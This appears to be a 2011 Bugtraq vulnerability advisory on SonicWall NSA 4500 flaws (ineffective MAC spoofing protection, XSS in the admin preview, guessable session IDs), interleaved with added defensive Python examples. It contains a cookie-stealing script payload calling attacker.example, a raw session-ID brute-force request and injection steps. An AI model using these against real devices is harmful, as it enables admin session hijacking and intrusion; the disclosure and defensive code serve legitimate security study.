Bugtraq mailing list archives

Multiple vulnerabilities in SonicWall


From: hvazquez () pentest es
Date: Tue, 4 Oct 2011 11:20:03 GMT

While pentesting a WiFi network for a customer, we found some vulnerabilities in the SonicWall NSA 4500. You can find
details here:

http://www.pentest.es/vulns_sonicpoint.txt

--------------------------------------------------
Title:
======

SonicWall products with incompatible MAC spoofing protection


Date:
=====
2011-09-29


Introduction:
=============

The SonicWall NSA 4500 has a MAC spoofing protection option that can be enabled for wireless networks on a per-ESSID
basis. This protection does not work if the access point is a SonicPoint. No warning or notice is presented to the
administrator, which means the protection is shown as active but is not working. This vulnerability was detected while
pentesting a customer WiFi deployment with that configuration: SonicWall NSA 4500 + SonicWall SonicPoints.


Report-Timeline:
================
2011-09-26:     Vendor Notification
2011-09-28:     Vendor Final Response

The vendor confirmed the bug in a customer support response.


Affected Products:
==================

SonicWall NSA 4500 + SonicWall SonicPoints


Exploitation-Technique:
=======================

Common ARP spoofing attacks.
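Because the gateway's MAC spoofing protection is silently not applied behind a SonicPoint, an operator has to watch the wireless segment for the ARP spoofing the advisory names. The following is an added example, not code from the advisory or from SonicWall: it parses raw Ethernet/ARP frames and flags the two symptoms such an attack leaves in ARP traffic, an IP whose MAC changes (cache poisoning) and one MAC claiming more than one IP (a cloned client MAC). All addresses and frames below are constructed for the example.

```python
"""ARP-based spoofing detector over raw Ethernet frames.

Added example, not part of the advisory or of any SonicWall software. It shows what an
operator can watch for when the gateway's own MAC spoofing protection is not applied."""
import struct
from collections import defaultdict

ETH_HDR = struct.Struct("!6s6sH")          # dst MAC, src MAC, EtherType
ARP_HDR = struct.Struct("!HHBBH6s4s6s4s")  # htype, ptype, hlen, plen, oper, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806
ARP_REPLY = 2


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def parse_arp(frame):
    """Return (oper, sender_mac, sender_ip, target_mac, target_ip) for an Ethernet/IPv4
    ARP frame, or None for anything else (too short, other EtherType, other hw/proto)."""
    if len(frame) < ETH_HDR.size + ARP_HDR.size:
        return None
    _dst, _src, ethertype = ETH_HDR.unpack_from(frame, 0)
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, oper, sha, spa, tha, tpa = ARP_HDR.unpack_from(frame, ETH_HDR.size)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return oper, mac_str(sha), ip_str(spa), mac_str(tha), ip_str(tpa)


def detect_spoofing(frames):
    """Learn sender IP->MAC bindings from ARP replies and flag:
      ip-mac-change : an IP whose MAC changes (ARP cache poisoning of that IP)
      mac-multi-ip  : one MAC claiming a second IP (a cloned client MAC in use elsewhere)
    Bindings are learned on first sight, so the first frames seen must be trusted."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != ARP_REPLY:
            continue
        _oper, sha, spa, _tha, _tpa = parsed
        if spa in ip_to_mac and ip_to_mac[spa] != sha:
            alerts.append(f"ip-mac-change {spa}: {ip_to_mac[spa]} -> {sha}")
        ip_to_mac[spa] = sha
        if spa not in mac_to_ips[sha]:
            mac_to_ips[sha].add(spa)
            if len(mac_to_ips[sha]) > 1:
                alerts.append(f"mac-multi-ip {sha}: {sorted(mac_to_ips[sha])}")
    return alerts


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Assemble a raw ARP reply frame; used here only to construct sample traffic."""
    eth = ETH_HDR.pack(target_mac, sender_mac, ETHERTYPE_ARP)
    arp = ARP_HDR.pack(1, 0x0800, 6, 4, ARP_REPLY, sender_mac, sender_ip, target_mac, target_ip)
    return eth + arp


# Constructed sample traffic (invented addresses, not a real capture).
GATEWAY_MAC, GATEWAY_IP = bytes.fromhex("001122334455"), bytes([10, 0, 0, 1])
CLIENT_MAC, CLIENT_IP = bytes.fromhex("66778899aabb"), bytes([10, 0, 0, 20])
ATTACKER_MAC, ATTACKER_IP = bytes.fromhex("ccddeeff0011"), bytes([10, 0, 0, 66])

SAMPLE_FRAMES = [
    build_arp_reply(GATEWAY_MAC, GATEWAY_IP, CLIENT_MAC, CLIENT_IP),    # legitimate gateway reply
    build_arp_reply(CLIENT_MAC, CLIENT_IP, GATEWAY_MAC, GATEWAY_IP),    # legitimate client reply
    build_arp_reply(ATTACKER_MAC, GATEWAY_IP, CLIENT_MAC, CLIENT_IP),   # poisons the client's view of the gateway
    build_arp_reply(CLIENT_MAC, ATTACKER_IP, GATEWAY_MAC, GATEWAY_IP),  # attacker using the client's cloned MAC
]


def run_sample():
    return detect_spoofing(SAMPLE_FRAMES)


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

Feed `detect_spoofing` the frames from a capture on the wireless VLAN (for example via a raw socket or a pcap reader) rather than `SAMPLE_FRAMES`. Note that a cloned MAC reusing the victim's IP as well is invisible to ARP alone; that case needs 802.11-level checks such as sequence-number or signal-strength anomalies.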


Severity:
=========

High. Customers do not know they are unprotected even though they have MAC spoofing protection activated.


Details:
========



--------------------------------------------------

Title:
======

SonicWall web admin interface multiple code injection vulnerabilities


Date:
=====
2011-09-29


Introduction:
=============

The SonicWall NSA 4500 web admin interface offers the option to customize some web pages directly from the admin
interface. For this, the web interface has forms where the admin can enter the code and test it via a preview
feature. The preview shows the page and executes all the JavaScript inside it in the web admin security context,
which leads to many traditional attacks such as XSS and session hijacking.


Report-Timeline:
================

Not reported.


Affected Products:
==================

SonicWall NSA 4500


Exploitation-Technique:
=======================

Common code injection techniques (XSS)


Severity:
=========

Medium. 


Details:
========

To reproduce the flaw, go to main.html, Users -> Settings, and put whatever code you want in "Login page content":
it will be executed in the admin context. This behaviour is a dangerous feature of the web admin interface, because
it can be exploited and triggered in several ways by an attacker. Fields other than "Login page content" can be
exploited in the same way.
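The root cause above is a preview that renders administrator-supplied HTML inside the admin page's own origin. The following is an added example, not SonicWall code and not from the advisory: it contrasts that pattern with a preview that renders the same content inside a sandboxed iframe via `srcdoc`. With `sandbox="allow-scripts"` and without `allow-same-origin`, scripts in the preview still execute (so the preview stays faithful) but in an opaque origin that cannot read the admin page's DOM, cookies or storage. The payload string is constructed for the example and is hypothetical.

```python
"""Admin page-preview: the pattern the advisory describes beside a sandboxed alternative.

Added example, not SonicWall code. Both functions return (headers, body) as a minimal
stand-in for whatever web framework actually serves the admin interface."""
from html import escape

# Constructed administrator input: the kind of thing an attacker would want in
# "Login page content". Hypothetical payload, not from the advisory.
HOSTILE_CONTENT = (
    '<h1>Welcome</h1>'
    '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'
)


def preview_unsafe(content):
    """Vulnerable pattern: the submitted HTML is inlined into the admin page itself, so any
    <script> it carries runs with the admin session's origin and cookies."""
    body = f"<html><body><div id='preview'>{content}</div></body></html>"
    headers = {"Content-Type": "text/html; charset=utf-8"}
    return headers, body


def preview_sandboxed(content):
    """Hardened pattern: the HTML is rendered inside a sandboxed iframe through srcdoc.
    sandbox="allow-scripts" lets the preview's own scripts run, but because
    allow-same-origin is NOT granted they execute in an opaque origin with no access to the
    parent document, its cookies or its storage. The content is attribute-escaped so it
    cannot break out of the srcdoc quotes; the browser decodes the entities when it parses
    the attribute, so the preview still renders the original markup."""
    srcdoc = escape(content, quote=True)
    body = (
        "<html><body>"
        f'<iframe sandbox="allow-scripts" srcdoc="{srcdoc}" title="preview"></iframe>'
        "</body></html>"
    )
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    return headers, body


def raw_script_in_page(body):
    """True when a <script> tag appears as markup of the page itself (not escaped inside an
    attribute), i.e. when it would run in the page's own origin."""
    return "<script>" in body
```

Serving the preview from a dedicated origin (a separate hostname with no admin cookies) would be stronger still; the sandbox attribute is the change that can be made without altering the deployment.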

--------------------------------------------------


Title:
======

SonicWall weak HTTP session IDs


Date:
=====
2011-09-29


Introduction:
=============

The SonicWall NSA 4500 web admin interface generates session IDs that are stored in the "SessId" cookie. The IDs
are guessable via brute force, which leads to admin session hijacking.


Report-Timeline:
================

Not reported.


Affected Products:
==================

SonicWall NSA 4500


Exploitation-Technique:
=======================

To brute force, just make requests like this:


GET /log.wri HTTP/1.0
Host: 123.123.123.123
Connection: close
User-Agent: brute-forcing
Cookie: SessId=111111111

Where SessId is the value being brute-forced (it should change in every request) and Host is the SonicWall IP.


If the guess fails you get a 404 HTTP response. If it succeeds, you get a 200 HTTP response and will see the SonicWall
logs.


Severity:
=========

Medium. 


Details:
========

HTTP "SessId" brute force. From a LAN, 10% of all IDs can be brute-forced in one day. The more administrators are
logged in, the more dangerous the scenario and the easier the brute-force attack.
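The brute-force request above and the "10% of all IDs in one day" figure invite two questions a tester asks of any session token: how much of the cookie actually varies, and how the search cost scales with the number of logged-in administrators. The following is an added example, not from the advisory: it scores a sample of observed IDs (per-position Shannon entropy, counter-like increments) and works the probability arithmetic behind the Details section. The sample values are constructed, and the assumption that the token is nine decimal digits is taken only from the `SessId=111111111` shape of the request shown above; the real keyspace and generator are not stated on the page.

```python
"""Session-ID predictability and brute-force cost estimates.

Added example, not from the advisory. SAMPLE_IDS are invented values shaped like the
SessId=111111111 cookie in the request above; the assumed keyspace of 10**9 follows from
that nine-digit shape and is an assumption, not a documented fact."""
import math
from collections import Counter

SAMPLE_IDS = [  # constructed, not captured from a device
    "104739210", "104739211", "104739215", "104739220", "104739222",
    "104739231", "104739238", "104739240", "104739247", "104739252",
]
SECONDS_PER_DAY = 86400


def per_position_entropy_bits(ids):
    """Shannon entropy in bits of each character position across the sample.
    A position that never changes contributes 0 bits (a fixed prefix)."""
    n = len(ids)
    width = len(ids[0])
    entropies = []
    for pos in range(width):
        counts = Counter(s[pos] for s in ids)
        entropies.append(-sum((c / n) * math.log2(c / n) for c in counts.values()))
    return entropies


def observed_entropy_bits(ids):
    """Rough upper bound on the effective keyspace, in bits, visible in the sample."""
    return sum(per_position_entropy_bits(ids))


def looks_like_counter(ids, max_step=16):
    """True when the numeric IDs strictly increase in small steps: a fresh admin login
    would then be guessable from any single observed ID, no brute force needed."""
    vals = [int(s) for s in ids]
    return all(0 < b - a <= max_step for a, b in zip(vals, vals[1:]))


def fraction_searched(req_per_sec, seconds, keyspace):
    """Fraction of the keyspace a brute-forcer covers at a given request rate."""
    return min(1.0, req_per_sec * seconds / keyspace)


def implied_rate(keyspace, fraction, seconds):
    """Request rate needed to cover `fraction` of `keyspace` in `seconds`."""
    return keyspace * fraction / seconds


def prob_hijack(fraction, active_sessions):
    """P(at least one of `active_sessions` valid IDs is hit) after searching `fraction`
    of the keyspace, assuming uniformly random, independent IDs. This is why more
    logged-in administrators make the attack easier."""
    return 1.0 - (1.0 - fraction) ** active_sessions


def analyse(ids=SAMPLE_IDS, keyspace=10 ** 9, req_per_sec=1000, active_sessions=3):
    """Summarise the sample and the brute-force economics for the given assumptions."""
    f = fraction_searched(req_per_sec, SECONDS_PER_DAY, keyspace)
    return {
        "entropy_bits": observed_entropy_bits(ids),
        "counter_like": looks_like_counter(ids),
        "fraction_per_day": f,
        "p_hijack_one_admin": prob_hijack(f, 1),
        "p_hijack_n_admins": prob_hijack(f, active_sessions),
        # request rate that reproduces "10% of all IDs in one day" for this keyspace
        "rate_for_10pct_per_day": implied_rate(keyspace, 0.10, SECONDS_PER_DAY),
    }


if __name__ == "__main__":
    for key, value in analyse().items():
        print(f"{key}: {value}")
```

Replace `SAMPLE_IDS` with cookies collected from repeated logins against a test device to measure the real token; if `looks_like_counter` is true, the brute-force loop above collapses to guessing a few values around the last observed one.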
--------------------------------------------------

info () pentest es 
Hugo Vázquez Caramés
PENTEST Consultores

